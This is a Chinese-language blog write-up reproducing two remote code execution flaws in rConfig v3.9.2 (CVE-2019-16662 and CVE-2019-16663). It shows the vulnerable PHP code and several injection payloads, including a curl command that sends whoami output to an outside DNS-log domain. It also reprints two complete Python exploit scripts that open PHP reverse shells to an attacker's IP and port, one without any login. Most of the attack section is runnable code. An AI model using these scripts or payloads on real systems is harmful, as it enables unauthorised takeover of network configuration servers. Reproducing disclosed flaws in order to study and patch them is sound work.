rConfig远程代码执行漏洞复现

0x00 前言

rConfig是一个开源网络设备配置管理解决方案，可以方便网络工程师快速、频繁管理网络设备快照。

近期国外安全研究员Askar公布了rConfig的两个RCE漏洞，并表示该漏洞未得到rConfig的确认修复。

影响至最新版本v3.9.2

下面对该漏洞进行复现。

0x01 漏洞复现

未授权代码执行

第一个漏洞无需登陆即可触发，漏洞发生在install/lib/ajaxHandlers/ajaxServerSettingsChk.php

漏洞处代码

$rootTestCmd1 = 'sudo -S -u ' . $rootUname . ' chmod 0777 /home 2>&1';    // line 12
exec($rootTestCmd1, $cmdOutput, $err);    // line 13

通过传入参数rootUname可控制进入exec的执行语句。

payload传入;id#即可执行id命令并得到回显。

该漏洞虽然未授权即可利用，但测试过程中该文件大部分情况下均为删除。

Askar给出利用脚本如下

#!/usr/bin/python
 
# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16662
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
 
import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()
 
target = sys.argv[1]
 
ip = sys.argv[2]
 
port = sys.argv[3]
 
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
 
install_path = target + "/install"
 
req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
 
print "[+] Triggering the payload"
print "[+] Check your listener !"
 
requests.get(url_to_send, verify=False)

后台无回显命令执行

第二个漏洞需要有一个认证账号，登陆后，漏洞触发点在lib/crud/search.crud.php

payload

searchTerm=anything&catCommand=""&&$(`sleep 5`)#

该利用点执行命令后，无回显，因此可以使用sleep函数进行延迟判断

在这里我使用dnslog方式获取到命令回显

""&&$(curl http://zhengbao.wang/`whoami`)#

成功获取到whoami执行结果为apache

同样Askar给出了反弹shell的利用方式。

#!/usr/bin/python
 
# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16663
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
 
 
import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
if len(sys.argv) != 6:
    print "[+] Usage : ./exploit.py target username password ip port"
    exit()
 
target = sys.argv[1]
 
username = sys.argv[2]
 
password = sys.argv[3]
 
ip = sys.argv[4]
 
port = sys.argv[5]
 
request = requests.session()
 
login_info = {
    "user": username,
    "pass": password,
    "sublogin": 1
}
 
login_request = request.post(
    target+"/lib/crud/userprocess.php",
     login_info,
     verify=False,
     allow_redirects=True
 )
 
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
 
 
if dashboard_request.status_code == 200:
    print "[+] LoggedIn successfully"
    payload = '''""&&php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)
    encoded_request = target+"/lib/crud/search.crud.php?searchTerm=anything&catCommand={0}".format(quote(payload))
    print "[+] triggering the payload"
    print "[+] Check your listener !"
    exploit_req = request.get(encoded_request)
 
elif dashboard_request.status_code == 302:
    print "[-] Wrong credentials !"
    exit()

0x02 参考链接

https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/